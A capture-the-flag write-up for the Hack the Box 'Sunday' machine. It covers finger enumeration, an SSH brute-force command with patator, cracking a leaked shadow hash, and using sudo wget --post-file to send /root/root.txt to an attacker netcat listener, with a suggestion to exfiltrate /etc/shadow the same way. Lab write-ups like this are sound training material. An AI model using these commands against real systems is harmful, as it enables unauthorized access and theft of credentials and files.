Hack the Box: Sunday

in #ethicalhacking6 years ago

By now, you know how to obtain HTB invite and how to connect to it's VPN, Let's start with Sunday machine

Level: Intermediate

Flags: To find user.txt and root.txt file

As a thumb rule always start with scanning the machine via nmap

nmap -sS -O -A 10.10.10.76 -p 1-65535

02.png

Observe that port 22022 - SSH and port 79 - Sun Solaris Finger are vulnerable

You can use the finger service to see information about users that are logged in. Immediately, we can identify the user Sunny is using the finger service. If we want to identify more users, we can use the Metasploit module.

03.png>

I also searched for sunssh exploit, but came up with nothing

04.png

Well, that leaves us with a couple of options: brute force our way in with SSH or a password guessing attack. Always opt for a password guessing attack first. Usually, in Hack the box, the name means something. I decided to try a few passwords out for Sunny.
The password was sunday

OR you can brute force your way through patator
patator ssh_login host=10.10.10.76 port=22022 user=sunny password=FILE0 0=password.txt persistent=0

For that you'll need password.txt file for brute forcing. You can download it on Internet.

But when I tried to login into ssh by using above credential, it gave “no matching key exchange method found” error.
By googling I found

https://unix.stackexchange.com/questions/340844/how-to-enable-diffie-hellman-group1-sha1-key-exchange-on-debian-8-0

05.png

Here after browsing through some directories I found, backup folder

06.png

The file of interest is the shadow.backup. If you’re new to this, the shadow file contains the hashes for users and is usually only accessible by root and those in the sudoers file

07.png

There is another user sammy, if you're good in cryptography, you'll know that $5$ hash uses Sha256

Now copy the hash and use john the ripper to crack it. You can download the rockyou.txt list from the internet.

08.png

Login as sammy. Always type "sudo -l" to see what permissions does user have.

09.png

You'll get the user.txt

10.png

Observe that you have permission to run wget as sudo. The other flag root.txt is located in /root

we can post the content of root.txt file directly to the listening machine

Set up a netcat listener. "nc -nvlp 8081"

sudo wget --post-file=/root/root.txt 10.10.14.12:8081

11.png

12.png

This was the easy way. You can also use wget to transfer /etc/shadow file to obtain the root hash and then crack it to obtain root password. But that would consume a considerable amount of time.

Thus you've obtained the user.txt and root.txt files.
Here important thing to note was the usage of "wget"

kali.png